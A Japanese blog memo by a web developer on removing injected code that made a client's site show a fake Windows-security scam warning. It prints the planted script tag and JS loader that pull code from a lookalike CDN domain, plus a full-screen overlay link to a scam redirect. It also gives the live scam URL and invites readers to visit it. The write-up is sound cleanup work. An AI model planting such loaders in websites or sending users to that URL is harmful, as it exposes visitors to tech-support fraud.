web関連
webサイトで「Windowsセキュリティシステムが破損しています」って警告でたので修正してみた
詐欺警告みたいっすね
お客さんのサイトのトップとJsファイルになんかコード仕込まれてたので修正した時の備忘録
最初に
ソースを実際に直すのが目的の記事なので、警告についての詳しい情報については下記を参考にしてください。
▼お使いのセキュリティシステム破損!? 偽警告の消し方2つと迷惑ソフト対策
https://blogs.yahoo.co.jp/fireflyframer/34407779.html
▼Windows 詐欺警告「Windowsセキュリティシステムが破損しています」が出てしまった時の対処方法
http://tanweb.net/2017/12/22/17417/
以下より実際に改ざんされて埋め込まれてたコードを削除していきます。
ブラウザ上のサイトに表示されるコード
<div id="div490924" style="width: 100%; height: 100%; position: fixed; left: 0px; top: 0px; z-index: 99999999;">
<a href="http://cdnjp.googlestatisticalserver.com/redirect?u=https%3A%2F%2Fafilter.xyz%2Fc%2F899%2F0%3F" target="_blank" style="display: block;width:100%; height: 100%; cursor: default"></a>
</div>
このコードが以降に記述するjavascriptで読み込まれてサイトの縦横いっぱいに詐欺警告ページへのリンク貼っつけてた
ファイルを改ざんされて埋め込まれていたコード
index.htmlファイル
<script type="text/javascript" charset="utf-8" src='//cdnjp.googlestatisticalserver.com/core.min.js' ></script>
最下部のbodyの閉じタグの前に入ってた
jsファイル
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//cdnjp.googlestatisticalserver.com/core.min.js";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'jquery-ui-sdk'));
上記「index.html」と「jsファイル」のソースコード消したら詐欺警告ページへのリンクが出なくなった
まとめ
恐らくフォーム経由で改ざんされたと思う
かなり昔のフォームで、昔フォームから改ざんが流行ってたみたいだし
しかも一度アクセスするとしばらくは詐欺警告ページのリンクでないから確認めんどくさかった
お客さんもたまたまかなって危機感感じないかもね
実際の詐欺警告ページのリンク貼っておくのでよければ確認してください
https://afilter.xyz/c/899/0
macはなぜかAmazonに飛ばされた
Windowsだけみたいね
お客さんにフォームの修正提案せねば